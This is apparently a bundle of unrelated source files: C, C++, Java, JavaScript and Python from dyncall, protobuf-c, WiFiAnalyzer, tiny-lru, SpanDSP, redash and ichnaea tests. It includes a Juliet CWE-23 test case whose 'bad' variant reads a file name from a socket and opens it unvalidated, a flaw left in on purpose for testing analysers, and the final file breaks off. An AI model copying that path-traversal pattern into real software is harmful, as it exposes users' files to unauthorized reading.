  vm = dcNewCallVM(4096);
  /* calls using 'formatted' API */
  dcReset(vm);
  printf("callf iii)i: ");
  dcCallF(vm, &ret, (void*)&vf_iii, "iii)i", 1, 2, 3);
  r = ret.i && r;
  dcReset(vm);
  printf("\ncallf ffiffiffi)i: ");
  dcCallF(vm, &ret, (void*)&vf_ffiffiffi, "ffiffiffi)i", 1.f, 2.f, 3, 4.f, 5.f, 6, 7.f, 8.f, 9);
  r = ret.i && r;
  /* same but with calling convention prefix */
  dcReset(vm);
  printf("\ncallf _:ffiffiffi)i: ");
  dcCallF(vm, &ret, (void*)&vf_ffiffiffi, "_:ffiffiffi)i", 1.f, 2.f, 3, 4.f, 5.f, 6, 7.f, 8.f, 9);
  r = ret.i && r;
  /* vararg call */
  dcReset(vm);
  printf("\ncallf _effi_.ddiddi)i: ");
  dcCallF(vm, &ret, (void*)&vf_ffiV, "_effi_.ddiddi)i", 1.f, 2.f, 3, 4., 5., 6, 7., 8., 9);
  r = ret.i && r;
  /* arg binding then call using 'formatted' API */
  dcReset(vm);
  /* reset calling convention too */
  dcMode(vm, DC_CALL_C_DEFAULT);
  printf("\nargf iii)i then call: ");
  dcArgF(vm, "iii)i", 1, 2, 3);
  r = r && dcCallInt(vm, (void*)&vf_iii);
  dcReset(vm);
  /* same signature but without the ')i' return-type suffix */
  printf("\nargf iii then call: ");
  dcArgF(vm, "iii", 1, 2, 3);
  r = r && dcCallInt(vm, (void*)&vf_iii);
  dcReset(vm);
  printf("\nargf ffiffiffi)i then call: ");
  dcArgF(vm, "ffiffiffi)i", 1.f, 2.f, 3, 4.f, 5.f, 6, 7.f, 8.f, 9);
  r = r && dcCallInt(vm, (void*)&vf_ffiffiffi);
  dcReset(vm);
  printf("\nargf ffiffiffi then call: ");
  dcArgF(vm, "ffiffiffi", 1.f, 2.f, 3, 4.f, 5.f, 6, 7.f, 8.f, 9);
  r = r && dcCallInt(vm, (void*)&vf_ffiffiffi);
#if defined(DC_UNIX) && !defined(DC__OS_MacOSX) && !defined(DC__OS_SunOS) && !defined(DC__OS_BeOS)
  /* testing syscall using calling convention prefix - not available on all platforms */
  dcReset(vm);
  printf("\ncallf _$iZi)i");
  fflush(NULL); /* needed before syscall write as it's immediate, or order might be incorrect */
  dcCallF(vm, &ret, (DCpointer)(ptrdiff_t)SYS_write, "_$iZi)i", 1/*stdout*/, " = syscall: 1", 13);
  r = ret.i == 13 && r;
#endif
  /* free vm */
  dcFree(vm);
  /* NOTE(review): exits 0 regardless of r; presumably the test harness
     parses the printed "result: callf: %d" line - confirm */
  printf("\nresult: callf: %d\n", r);
  dcTest_deInitPlatform();
  return 0;
}
|
// This is a library to be used to represent a Graph and various measurments for a Graph
// and to perform optimization using Particle Swarm Optimization (PSO)
// Copyright (C) 2008, 2015
// Patrick Olekas - [email protected]
// Ali Minai - [email protected]
//
// This program is free software: you can redistribute it and/or modify
// it under the terms of the GNU General Public License as published by
// the Free Software Foundation, either version 3 of the License, or
// (at your option) any later version.
//
// This program is distributed in the hope that it will be useful,
// but WITHOUT ANY WARRANTY; without even the implied warranty of
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
// GNU General Public License for more details.
//
// You should have received a copy of the GNU General Public License
// along with this program. If not, see <http://www.gnu.org/licenses/>.
package psograph.graph;
import java.io.Serializable;
/**
 * This represents an Edge.
*
* There is some commented out code I believe in this file to support DAG and the concept
* of multiple edges between two nodes.
* @author Patrick
*
*/
public class Edge implements Serializable
{
static final long serialVersionUID = 45L;
/**
* Copy Constructor
* @param ci
*/
public Edge(Edge ci)
{
m_weight = ci.m_weight;
}
/**
* Constructor
* @param weight
*/
public Edge(double weight)
{
m_weight = weight;
}
/**
* Comparison of two objects
*/
public boolean equals (Object obj)
{
boolean ret = true;
Edge e = (Edge)obj;
if(Double.compare(m_weight, e.getWeight()) != 0)
{
ret = false;
}
return ret;
}
/**
* Mutator for weight value.
* @param weight
*/
public void modifyWeight(double weight)
{
m_weight = weight;
}
/**
* Accessor for weight.
* @return
*/
public double getWeight()
{
return m_weight;
}
private double m_weight;
/* Only allow on weight per node to node connection
ConnectionInfo(ConnectionInfo ci)
{
m_weight = new Vector<Integer>(ci.m_weight);
}
ConnectionInfo(int weight)
{
m_weight = new Vector<Integer>();
m_weight.add(weight);
}
ConnectionInfo(int weight[])
{
m_weight = new Vector<Integer>();
for(int i=0; i < weight.length; i++)
m_weight.add(weight[i]);
}
void addWeight(int weight)
{
m_weight.add(weight);
}
void addWeights(int weight[])
{
m_weight = new Vector<Integer>();
for(int i=0; i < weight.length; i++)
m_weight.add(weight[i]);
}
void removeWeight(int weight)
{
m_weight.remove(new Integer(weight));
}
void removeWeights(int weight[])
{
for(int i=0; i < weight.length; i++)
m_weight.remove(new Integer(weight[i]));
}
Vector<Integer> m_weight;
*/
}
|
// Protocol Buffers - Google's data interchange format
// Copyright 2008 Google Inc.
// http://code.google.com/p/protobuf/
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
// Author: [email protected] (Kenton Varda)
// Based on original Protocol Buffers design by
// Sanjay Ghemawat, Jeff Dean, and others.
// Modified to implement C code by Dave Benson.
#include <google/protobuf/compiler/c/c_enum_field.h>
#include <google/protobuf/compiler/c/c_helpers.h>
#include <google/protobuf/io/printer.h>
#include <google/protobuf/wire_format.h>
namespace google {
namespace protobuf {
namespace compiler {
namespace c {
using internal::WireFormat;
// TODO(kenton): Factor out a "SetCommonFieldVariables()" to get rid of
// repeat code between this and the other field types.
void SetEnumVariables(const FieldDescriptor* descriptor,
map<string, string>* variables) {
(*variables)["name"] = FieldName(descriptor);
(*variables)["type"] = FullNameToC(descriptor->enum_type()->full_name());
if (descriptor->has_default_value()) {
const EnumValueDescriptor* default_value = descriptor->default_value_enum();
(*variables)["default"] = FullNameToUpper(default_value->type()->full_name())
+ "__" + ToUpper(default_value->name());
} else
(*variables)["default"] = "0";
(*variables)["deprecated"] = FieldDeprecated(descriptor);
}
// ===================================================================
// Constructs the generator and precomputes the substitution variables
// for the given enum field.
EnumFieldGenerator::
EnumFieldGenerator(const FieldDescriptor* descriptor)
  : FieldGenerator(descriptor)
{
  SetEnumVariables(descriptor, &variables_);
}
// Nothing to release; variables_ cleans itself up.
EnumFieldGenerator::~EnumFieldGenerator() {}
// Emit the C struct member(s) representing this enum field: a bare value
// for required, a has_ flag plus value for optional, and a count plus
// pointer for repeated.
void EnumFieldGenerator::GenerateStructMembers(io::Printer* printer) const
{
  const FieldDescriptor::Label label = descriptor_->label();
  if (label == FieldDescriptor::LABEL_REQUIRED) {
    printer->Print(variables_, "$type$ $name$$deprecated$;\n");
  } else if (label == FieldDescriptor::LABEL_OPTIONAL) {
    printer->Print(variables_, "protobuf_c_boolean has_$name$$deprecated$;\n");
    printer->Print(variables_, "$type$ $name$$deprecated$;\n");
  } else if (label == FieldDescriptor::LABEL_REPEATED) {
    printer->Print(variables_, "size_t n_$name$$deprecated$;\n");
    printer->Print(variables_, "$type$ *$name$$deprecated$;\n");
  }
}
// Return the C constant used as this field's static default value
// (always present: SetEnumVariables stores "0" when no default is set).
string EnumFieldGenerator::GetDefaultValue(void) const
{
  map<string, string>::const_iterator it = variables_.find("default");
  return it->second;
}
// Emit the static initializer fragment for this field within a generated
// message initializer.
void EnumFieldGenerator::GenerateStaticInit(io::Printer* printer) const
{
  const FieldDescriptor::Label label = descriptor_->label();
  if (label == FieldDescriptor::LABEL_REQUIRED) {
    printer->Print(variables_, "$default$");
  } else if (label == FieldDescriptor::LABEL_OPTIONAL) {
    // has_ flag starts cleared, value starts at the default.
    printer->Print(variables_, "0,$default$");
  } else if (label == FieldDescriptor::LABEL_REPEATED) {
    // no support for default?
    printer->Print("0,NULL");
  }
}
// Emit the ProtobufCFieldDescriptor initializer for this field, pointing
// the descriptor slot at the generated enum descriptor symbol.
void EnumFieldGenerator::GenerateDescriptorInitializer(io::Printer* printer) const
{
  string addr("&");
  addr += FullNameToLower(descriptor_->enum_type()->full_name());
  addr += "__descriptor";
  GenerateDescriptorInitializerGeneric(printer, true, "ENUM", addr);
}
} // namespace c
} // namespace compiler
} // namespace protobuf
} // namespace google
|
/*
* Copyright (C) 2015 - 2016 VREM Software Development <[email protected]>
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package com.vrem.wifianalyzer.wifi.graph.channel;
import android.content.Context;
import android.content.res.Resources;
import android.support.v4.util.Pair;
import android.view.View;
import com.jjoe64.graphview.GraphView;
import com.vrem.wifianalyzer.BuildConfig;
import com.vrem.wifianalyzer.Configuration;
import com.vrem.wifianalyzer.RobolectricUtil;
import com.vrem.wifianalyzer.settings.Settings;
import com.vrem.wifianalyzer.wifi.band.WiFiBand;
import com.vrem.wifianalyzer.wifi.band.WiFiChannel;
import com.vrem.wifianalyzer.wifi.graph.tools.GraphLegend;
import com.vrem.wifianalyzer.wifi.graph.tools.GraphViewWrapper;
import com.vrem.wifianalyzer.wifi.model.SortBy;
import com.vrem.wifianalyzer.wifi.model.WiFiConnection;
import com.vrem.wifianalyzer.wifi.model.WiFiData;
import com.vrem.wifianalyzer.wifi.model.WiFiDetail;
import org.junit.Before;
import org.junit.Test;
import org.junit.runner.RunWith;
import org.robolectric.RobolectricGradleTestRunner;
import org.robolectric.annotation.Config;
import java.util.ArrayList;
import java.util.Set;
import static org.junit.Assert.assertEquals;
import static org.mockito.Matchers.any;
import static org.mockito.Mockito.mock;
import static org.mockito.Mockito.verify;
import static org.mockito.Mockito.when;
@RunWith(RobolectricGradleTestRunner.class)
@Config(constants = BuildConfig.class)
/**
 * Unit tests for ChannelGraphView using mocked collaborators; Robolectric
 * supplies the Android environment.
 */
public class ChannelGraphViewTest {
    private Context context;
    private Resources resources;
    private Settings settings;
    private Configuration configuration;
    private GraphViewWrapper graphViewWrapper;
    private ChannelGraphView fixture;

    @Before
    public void setUp() throws Exception {
        // Boots the Robolectric main activity before mocks are injected.
        RobolectricUtil.INSTANCE.getMainActivity();
        graphViewWrapper = mock(GraphViewWrapper.class);
        context = mock(Context.class);
        resources = mock(Resources.class);
        settings = mock(Settings.class);
        configuration = mock(Configuration.class);
        // Fixture for the 2.4 GHz band with an unknown channel pair.
        fixture = new ChannelGraphView(WiFiBand.GHZ2, new Pair<>(WiFiChannel.UNKNOWN, WiFiChannel.UNKNOWN));
        fixture.setGraphViewWrapper(graphViewWrapper);
        fixture.setContext(context);
        fixture.setResources(resources);
        fixture.setSettings(settings);
        fixture.setConfiguration(configuration);
    }

    @Test
    public void testUpdate() throws Exception {
        // setup: empty scan results and no current connection
        WiFiData wiFiData = new WiFiData(new ArrayList<WiFiDetail>(), WiFiConnection.EMPTY, new ArrayList<String>());
        withSettings();
        // execute
        fixture.update(wiFiData);
        // validate: stale series removed, legend refreshed, view shown
        verify(graphViewWrapper).removeSeries(any(Set.class));
        verify(graphViewWrapper).updateLegend(GraphLegend.RIGHT);
        verify(graphViewWrapper).setVisibility(View.VISIBLE);
        verifySettings();
    }

    // Asserts that update() consulted each relevant setting exactly once.
    private void verifySettings() {
        verify(settings).getChannelGraphLegend();
        verify(settings).getSortBy();
        verify(settings).getWiFiBand();
    }

    // Stubs the settings mock with the values the tests expect.
    private void withSettings() {
        when(settings.getChannelGraphLegend()).thenReturn(GraphLegend.RIGHT);
        when(settings.getSortBy()).thenReturn(SortBy.CHANNEL);
        when(settings.getWiFiBand()).thenReturn(WiFiBand.GHZ2);
    }

    @Test
    public void testGetGraphView() throws Exception {
        // setup
        GraphView expected = mock(GraphView.class);
        when(graphViewWrapper.getGraphView()).thenReturn(expected);
        // execute
        GraphView actual = fixture.getGraphView();
        // validate: the wrapper's view is returned unchanged
        assertEquals(expected, actual);
        verify(graphViewWrapper).getGraphView();
    }
}
/* TEMPLATE GENERATED TESTCASE FILE
Filename: CWE23_Relative_Path_Traversal__char_connect_socket_ifstream_83_bad.cpp
Label Definition File: CWE23_Relative_Path_Traversal.label.xml
Template File: sources-sink-83_bad.tmpl.cpp
*/
/*
* @description
* CWE: 23 Relative Path Traversal
* BadSource: connect_socket Read data using a connect socket (client side)
* GoodSource: Use a fixed file name
* Sinks: ifstream
* BadSink : Open the file named in data using ifstream::open()
* Flow Variant: 83 Data flow: data passed to class constructor and destructor by declaring the class object on the stack
*
* */
#ifndef OMITBAD
#include "std_testcase.h"
#include "CWE23_Relative_Path_Traversal__char_connect_socket_ifstream_83.h"
#ifdef _WIN32
#include <winsock2.h>
#include <windows.h>
#include <direct.h>
#pragma comment(lib, "ws2_32") /* include ws2_32.lib when linking */
#define CLOSE_SOCKET closesocket
#else /* NOT _WIN32 */
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <unistd.h>
#define INVALID_SOCKET -1
#define SOCKET_ERROR -1
#define CLOSE_SOCKET close
#define SOCKET int
#endif
#define TCP_PORT 27015
#define IP_ADDRESS "127.0.0.1"
#include <fstream>
using namespace std;
namespace CWE23_Relative_Path_Traversal__char_connect_socket_ifstream_83
{
// Constructor: reads attacker-controllable data from a TCP socket and
// appends it to the buffer pointed to by dataCopy.  NOTE: this is a
// generated Juliet/SARD test case - the path-traversal flaw is INTENTIONAL
// and must not be "fixed".
CWE23_Relative_Path_Traversal__char_connect_socket_ifstream_83_bad::CWE23_Relative_Path_Traversal__char_connect_socket_ifstream_83_bad(char * dataCopy)
{
    data = dataCopy;
    {
#ifdef _WIN32
        WSADATA wsaData;
        int wsaDataInit = 0;
#endif
        int recvResult;
        struct sockaddr_in service;
        char *replace;
        SOCKET connectSocket = INVALID_SOCKET;
        size_t dataLen = strlen(data);
        /* do/while(0) gives a single-exit cleanup path via break */
        do
        {
#ifdef _WIN32
            if (WSAStartup(MAKEWORD(2,2), &wsaData) != NO_ERROR)
            {
                break;
            }
            wsaDataInit = 1;
#endif
            /* POTENTIAL FLAW: Read data using a connect socket */
            connectSocket = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
            if (connectSocket == INVALID_SOCKET)
            {
                break;
            }
            memset(&service, 0, sizeof(service));
            service.sin_family = AF_INET;
            service.sin_addr.s_addr = inet_addr(IP_ADDRESS);
            service.sin_port = htons(TCP_PORT);
            if (connect(connectSocket, (struct sockaddr*)&service, sizeof(service)) == SOCKET_ERROR)
            {
                break;
            }
            /* Abort on error or the connection was closed, make sure to recv one
             * less char than is in the recv_buf in order to append a terminator */
            /* Abort on error or the connection was closed */
            recvResult = recv(connectSocket, (char *)(data + dataLen), sizeof(char) * (FILENAME_MAX - dataLen - 1), 0);
            if (recvResult == SOCKET_ERROR || recvResult == 0)
            {
                break;
            }
            /* Append null terminator */
            data[dataLen + recvResult / sizeof(char)] = '\0';
            /* Eliminate CRLF */
            replace = strchr(data, '\r');
            if (replace)
            {
                *replace = '\0';
            }
            replace = strchr(data, '\n');
            if (replace)
            {
                *replace = '\0';
            }
        }
        while (0);
        /* cleanup: close the socket and (Windows) tear down Winsock */
        if (connectSocket != INVALID_SOCKET)
        {
            CLOSE_SOCKET(connectSocket);
        }
#ifdef _WIN32
        if (wsaDataInit)
        {
            WSACleanup();
        }
#endif
    }
}
// Destructor: the sink of the test case - opens the tainted file name
// without any validation (the CWE-23 flaw under test).
CWE23_Relative_Path_Traversal__char_connect_socket_ifstream_83_bad::~CWE23_Relative_Path_Traversal__char_connect_socket_ifstream_83_bad()
{
    {
        ifstream inputFile;
        /* POTENTIAL FLAW: Possibly opening a file without validating the file name or path */
        inputFile.open((char *)data);
        inputFile.close();
    }
}
}
#endif /* OMITBAD */
|
/**
* Tiny LRU cache for Client or Server
*
* @author Jason Mulligan <[email protected]>
* @copyright 2018
* @license BSD-3-Clause
* @link https://github.com/avoidwork/tiny-lru
* @version 5.0.5
*/
"use strict";
(function (global) {
const empty = null;
class LRU {
constructor (max, ttl) {
this.clear();
this.max = max;
this.ttl = ttl;
}
clear () {
this.cache = {};
this.first = empty;
this.last = empty;
this.length = 0;
return this;
}
delete (key, bypass = false) {
return this.remove(key, bypass);
}
evict () {
if (this.length > 0) {
this.remove(this.last, true);
}
return this;
}
get (key) {
let result;
if (this.has(key) === true) {
const item = this.cache[key];
if (item.expiry === -1 || item.expiry > Date.now()) {
result = item.value;
this.set(key, result, true);
} else {
this.remove(key, true);
}
}
return result;
}
has (key) {
return key in this.cache;
}
remove (key, bypass = false) {
if (bypass === true || this.has(key) === true) {
const item = this.cache[key];
delete this.cache[key];
this.length--;
if (item.next !== empty) {
this.cache[item.next].prev = item.prev;
}
if (item.prev !== empty) {
this.cache[item.prev].next = item.next;
}
if (this.first === key) {
this.first = item.next;
}
if (this.last === key) {
this.last = item.prev;
}
}
return this;
}
set (key, value, bypass = false) {
if (bypass === true || this.has(key) === true) {
const item = this.cache[key];
item.value = value;
if (this.first !== key) {
const p = item.prev,
n = item.next,
f = this.cache[this.first];
item.prev = empty;
item.next = this.first;
f.prev = key;
if (p !== empty) {
this.cache[p].next = n;
}
if (n !== empty) {
this.cache[n].prev = p;
}
if (this.last === key) {
this.last = p;
}
}
} else {
if (this.length === this.max) {
this.evict();
}
this.length++;
this.cache[key] = {
expiry: this.ttl > 0 ? new Date().getTime() + this.ttl : -1,
prev: empty,
next: this.first,
value: value
};
if (this.length === 1) {
this.last = key;
} else {
this.cache[this.first].prev = key;
}
}
this.first = key;
return this;
}
}
function factory (max = 1000, ttl = 0) {
return new LRU(max, ttl);
}
// Node, AMD & window supported
if (typeof exports !== "undefined") {
module.exports = factory;
} else if (typeof define === "function" && define.amd !== void 0) {
define(() => factory);
} else {
global.lru = factory;
}
}(typeof window !== "undefined" ? window : global));
|
/*
* SpanDSP - a series of DSP components for telephony
*
* super_tone_rx.h - Flexible telephony supervisory tone detection.
*
* Written by Steve Underwood <[email protected]>
*
* Copyright (C) 2003 Steve Underwood
*
* All rights reserved.
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU Lesser General Public License version 2.1,
* as published by the Free Software Foundation.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with this program; if not, write to the Free Software
* Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
*
* $Id: super_tone_rx.h,v 1.21 2009/02/10 13:06:47 steveu Exp $
*/
#if !defined(_SPANDSP_SUPER_TONE_RX_H_)
#define _SPANDSP_SUPER_TONE_RX_H_
/*! \page super_tone_rx_page Supervisory tone detection
\section super_tone_rx_page_sec_1 What does it do?
The supervisory tone detector may be configured to detect most of the world's
telephone supervisory tones - things like ringback, busy, number unobtainable,
and so on.
\section super_tone_rx_page_sec_2 How does it work?
The supervisory tone detector is passed a series of data structures describing
the tone patterns - the frequencies and cadencing - of the tones to be searched
for. It constructs one or more Goertzel filters to monitor the required tones.
If tones are close in frequency a single Goertzel set to the centre of the
frequency range will be used. This optimises the efficiency of the detector. The
Goertzel filters are applied without applying any special window function
(i.e. they use a rectangular window), so they have a sinc like response.
However, for most tone patterns their rejection qualities are adequate.
The detector aims to meet the need of the standard call progress tones, to
ITU-T E.180/Q.35 (busy, dial, ringback, reorder). Also, the extended tones,
to ITU-T E.180, Supplement 2 and EIA/TIA-464-A (recall dial tone, special
ringback tone, intercept tone, call waiting tone, busy verification tone,
executive override tone, confirmation tone).
*/
/*! Tone detection indication callback routine */
typedef void (*tone_report_func_t)(void *user_data, int code, int level, int delay);
typedef struct super_tone_rx_segment_s super_tone_rx_segment_t;
typedef struct super_tone_rx_descriptor_s super_tone_rx_descriptor_t;
typedef struct super_tone_rx_state_s super_tone_rx_state_t;
#if defined(__cplusplus)
extern "C"
{
#endif
/*! Create a new supervisory tone detector descriptor.
    \param desc The supervisory tone set descriptor. If NULL, the routine will allocate space for a
descriptor.
\return The supervisory tone set descriptor.
*/
SPAN_DECLARE(super_tone_rx_descriptor_t *) super_tone_rx_make_descriptor(super_tone_rx_descriptor_t *desc);
/*! Free a supervisory tone detector descriptor.
    \param desc The supervisory tone set descriptor.
\return 0 for OK, -1 for fail.
*/
SPAN_DECLARE(int) super_tone_rx_free_descriptor(super_tone_rx_descriptor_t *desc);
/*! Add a new tone pattern to a supervisory tone detector set.
\param desc The supervisory tone set descriptor.
\return The new tone ID. */
SPAN_DECLARE(int) super_tone_rx_add_tone(super_tone_rx_descriptor_t *desc);
/*! Add a new tone pattern element to a tone pattern in a supervisory tone detector.
    \param desc The supervisory tone set descriptor.
\param tone The tone ID within the descriptor.
\param f1 Frequency 1 (-1 for a silent period).
\param f2 Frequency 2 (-1 for a silent period, or only one frequency).
\param min The minimum duration, in ms.
\param max The maximum duration, in ms.
\return The new number of elements in the tone description.
*/
SPAN_DECLARE(int) super_tone_rx_add_element(super_tone_rx_descriptor_t *desc,
int tone,
int f1,
int f2,
int min,
int max);
/*! Initialise a supervisory tone detector.
\param s The supervisory tone detector context.
\param desc The tone descriptor.
\param callback The callback routine called to report the valid detection or termination of
one of the monitored tones.
\param user_data An opaque pointer passed when calling the callback routine.
\return The supervisory tone detector context.
*/
SPAN_DECLARE(super_tone_rx_state_t *) super_tone_rx_init(super_tone_rx_state_t *s,
super_tone_rx_descriptor_t *desc,
tone_report_func_t callback,
void *user_data);
/*! Release a supervisory tone detector.
\param s The supervisory tone context.
\return 0 for OK, -1 for fail.
*/
SPAN_DECLARE(int) super_tone_rx_release(super_tone_rx_state_t *s);
/*! Free a supervisory tone detector.
\param s The supervisory tone context.
\return 0 for OK, -1 for fail.
*/
SPAN_DECLARE(int) super_tone_rx_free(super_tone_rx_state_t *s);
/*! Define a callback routine to be called each time a tone pattern element is complete. This is
mostly used when analysing a tone.
\param s The supervisory tone context.
\param callback The callback routine.
*/
SPAN_DECLARE(void) super_tone_rx_segment_callback(super_tone_rx_state_t *s,
void (*callback)(void *data, int f1, int f2, int duration));
/*! Apply supervisory tone detection processing to a block of audio samples.
\brief Apply supervisory tone detection processing to a block of audio samples.
\param super The supervisory tone context.
\param amp The audio sample buffer.
\param samples The number of samples in the buffer.
\return The number of samples processed.
*/
SPAN_DECLARE(int) super_tone_rx(super_tone_rx_state_t *super, const int16_t amp[], int samples);
#if defined(__cplusplus)
}
#endif
#endif
/*- End of file ------------------------------------------------------------*/
|
import sys
import logging
import urlparse
import urllib
import redis
from flask import Flask, current_app
from flask_sslify import SSLify
from werkzeug.contrib.fixers import ProxyFix
from werkzeug.routing import BaseConverter
from statsd import StatsClient
from flask_mail import Mail
from flask_limiter import Limiter
from flask_limiter.util import get_ipaddr
from flask_migrate import Migrate
from redash import settings
from redash.query_runner import import_query_runners
from redash.destinations import import_destinations
__version__ = '7.0.0-beta'
import os

# Optionally attach the Visual Studio remote debugger when the REMOTE_DEBUG
# environment variable is set (listens on all interfaces, port 5678).
if os.environ.get("REMOTE_DEBUG"):
    import ptvsd
    ptvsd.enable_attach(address=('0.0.0.0', 5678))
def setup_logging():
    """Attach a stream handler to the root logger and quiet noisy libraries.

    The destination stream (stdout vs. stderr), the record format and the
    level are all taken from the application settings.
    """
    stream = sys.stdout if settings.LOG_STDOUT else sys.stderr
    handler = logging.StreamHandler(stream)
    handler.setFormatter(logging.Formatter(settings.LOG_FORMAT))

    root_logger = logging.getLogger()
    root_logger.addHandler(handler)
    root_logger.setLevel(settings.LOG_LEVEL)

    # Make noisy libraries less noisy, unless we are debugging.
    if settings.LOG_LEVEL != "DEBUG":
        for noisy_logger in ("passlib",
                             "requests.packages.urllib3",
                             "snowflake.connector",
                             "apiclient"):
            logging.getLogger(noisy_logger).setLevel("ERROR")
def create_redis_connection():
    """Create a StrictRedis client from ``settings.REDIS_URL``.

    Supports both TCP URLs (``redis://host:port/db``) and unix-socket URLs
    (``redis+socket:///path?virtual_host=db``).  The database index is taken
    from the URL path (TCP) or the ``virtual_host`` query parameter (socket),
    defaulting to 0.
    """
    logging.debug("Creating Redis connection (%s)", settings.REDIS_URL)
    redis_url = urlparse.urlparse(settings.REDIS_URL)

    if redis_url.scheme == 'redis+socket':
        qs = urlparse.parse_qs(redis_url.query)
        if 'virtual_host' in qs:
            db = qs['virtual_host'][0]
        else:
            db = 0
        client = redis.StrictRedis(unix_socket_path=redis_url.path, db=db)
    else:
        if redis_url.path:
            # Use everything after the leading "/" so that multi-digit
            # database indexes (e.g. "/12") are not truncated to their
            # first character (the previous `path[1]` only kept one char).
            redis_db = redis_url.path[1:]
        else:
            redis_db = 0

        # Redis passwords might be quoted with special characters
        redis_password = redis_url.password and urllib.unquote(redis_url.password)
        client = redis.StrictRedis(host=redis_url.hostname, port=redis_url.port, db=redis_db, password=redis_password)

    return client
# --- module initialisation: runs once on import ---
setup_logging()

# Shared Redis client used across the application.
redis_connection = create_redis_connection()

mail = Mail()
migrate = Migrate()
mail.init_mail(settings.all_settings())
statsd_client = StatsClient(host=settings.STATSD_HOST, port=settings.STATSD_PORT, prefix=settings.STATSD_PREFIX)
limiter = Limiter(key_func=get_ipaddr, storage_uri=settings.LIMITER_STORAGE)

# Load the configured query-runner and destination plugins.
import_query_runners(settings.QUERY_RUNNERS)
import_destinations(settings.DESTINATIONS)

from redash.version_check import reset_new_version_status
reset_new_version_status()
class SlugConverter(BaseConverter):
    """Werkzeug URL converter for organization slugs (currently a pass-through)."""

    def to_python(self, value):
        # This is a workaround for when we enable multi-org and some files are being called by the index rule:
        # for path in settings.STATIC_ASSETS_PATHS:
        #     full_path = safe_join(path, value)
        #     if os.path.isfile(full_path):
        #         raise ValidationError()
        return value

    def to_url(self, value):
        return value
def create_app():
    """Create and fully wire up the Flask application instance."""
    # Imported here (not at module level) to avoid circular imports.
    from redash import authentication, extensions, handlers
    from redash.handlers.webpack import configure_webpack
    from redash.handlers import chrome_logger
    from redash.models import db, users
    from redash.metrics.request import provision_app
    from redash.utils import sentry

    sentry.init()

    app = Flask(__name__,
                template_folder=settings.STATIC_ASSETS_PATH,
                static_folder=settings.STATIC_ASSETS_PATH,
                static_path='/static')

    # Make sure we get the right referral address even behind proxies like nginx.
    app.wsgi_app = ProxyFix(app.wsgi_app, settings.PROXIES_COUNT)
    app.url_map.converters['org_slug'] = SlugConverter

    if settings.ENFORCE_HTTPS:
        # Redirect HTTP to HTTPS everywhere except the health-check endpoint.
        SSLify(app, skips=['ping'])

    # configure our database
    app.config['SQLALCHEMY_DATABASE_URI'] = settings.SQLALCHEMY_DATABASE_URI
    app.config.update(settings.all_settings())

    # Initialise every sub-system against this app instance.
    provision_app(app)
    db.init_app(app)
    migrate.init_app(app, db)
    mail.init_app(app)
    authentication.init_app(app)
    limiter.init_app(app)
    handlers.init_app(app)
    configure_webpack(app)
    extensions.init_extensions(app)
    chrome_logger.init_app(app)
    users.init_app(app)

    return app
|
from datetime import timedelta
from random import randint
from ichnaea.data.tasks import (
monitor_api_key_limits,
monitor_api_users,
monitor_queue_size,
)
from ichnaea import util
class TestMonitor(object):
    """Tests for the monitor_* Celery tasks that emit StatsD gauges."""

    def test_monitor_api_keys_empty(self, celery, stats):
        # With no rate-limit keys in Redis the gauge reports zero.
        monitor_api_key_limits.delay().get()
        stats.check(gauge=[('api.limit', 0)])

    def test_monitor_api_keys_one(self, celery, redis, stats):
        # A single apilimit key for today yields one tagged gauge.
        today = util.utcnow().strftime('%Y%m%d')
        rate_key = 'apilimit:no_key_1:v1.geolocate:' + today
        redis.incr(rate_key, 13)
        monitor_api_key_limits.delay().get()
        stats.check(gauge=[
            ('api.limit', ['key:no_key_1', 'path:v1.geolocate']),
        ])

    def test_monitor_api_keys_multiple(self, celery, redis, stats):
        # Seed today's and yesterday's counters; only today's should be
        # reported, and unrelated Redis keys must be ignored.
        now = util.utcnow()
        today = now.strftime('%Y%m%d')
        yesterday = (now - timedelta(hours=24)).strftime('%Y%m%d')
        data = {
            'test': {'v1.search': 11, 'v1.geolocate': 13},
            'no_key_1': {'v1.search': 12},
            'no_key_2': {'v1.geolocate': 15},
        }
        for key, paths in data.items():
            for path, value in paths.items():
                rate_key = 'apilimit:%s:%s:%s' % (key, path, today)
                redis.incr(rate_key, value)
                rate_key = 'apilimit:%s:%s:%s' % (key, path, yesterday)
                redis.incr(rate_key, value - 10)

        # add some other items into Redis
        redis.lpush('default', 1, 2)
        redis.set('cache_something', '{}')

        monitor_api_key_limits.delay().get()
        stats.check(gauge=[
            ('api.limit', ['key:test', 'path:v1.geolocate']),
            ('api.limit', ['key:test', 'path:v1.search']),
            ('api.limit', ['key:no_key_1', 'path:v1.search']),
            ('api.limit', ['key:no_key_2', 'path:v1.geolocate']),
        ])

    def test_monitor_queue_size(self, celery, redis, stats):
        # Seed every known celery queue plus two export queues with random
        # lengths; expect one gauge per queue reporting its exact size.
        data = {
            'export_queue_internal': 3,
            'export_queue_backup:abcd-ef-1234': 7,
        }
        for name in celery.all_queues:
            data[name] = randint(1, 10)
        for k, v in data.items():
            redis.lpush(k, *range(v))
        monitor_queue_size.delay().get()
        stats.check(
            gauge=[('queue', 1, v, ['queue:' + k]) for k, v in data.items()])
class TestMonitorAPIUsers(object):
